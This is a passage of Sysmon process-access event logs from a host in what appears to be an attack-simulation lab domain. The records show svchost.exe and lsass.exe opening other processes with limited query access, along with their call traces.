C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00107FD70800}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010CDDD0800}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010CDDD0800}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.034\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.034","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.034\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.034","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.034\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.034","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 